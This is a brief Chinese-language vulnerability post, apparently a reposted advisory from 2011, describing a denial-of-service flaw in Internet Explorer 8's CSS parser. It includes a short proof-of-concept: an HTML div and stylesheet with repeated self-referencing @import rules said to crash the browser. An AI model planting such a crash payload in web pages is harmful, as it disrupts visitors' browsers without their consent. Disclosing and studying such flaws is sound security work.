IE8 CSS解析拒绝服务漏洞

2011-12-23 9:41:13 来源:网络转载 浏览:111
IE8 CSS解析拒绝服务漏洞
简要描述:IE8中对css的解析存在一个问题,导致任何访问包含非法css的页面将导致IE8崩溃重启
详细说明:
<div style="position: absolute; top: -999px;left: -999px;">
<link href="css.css" rel="stylesheet" type="text/css" />
*{
color:red;
}
@import url("css.css");
@import url("css.css");
@import url("css.css");
@import url("css.css");
漏洞证明:
(0)
(0)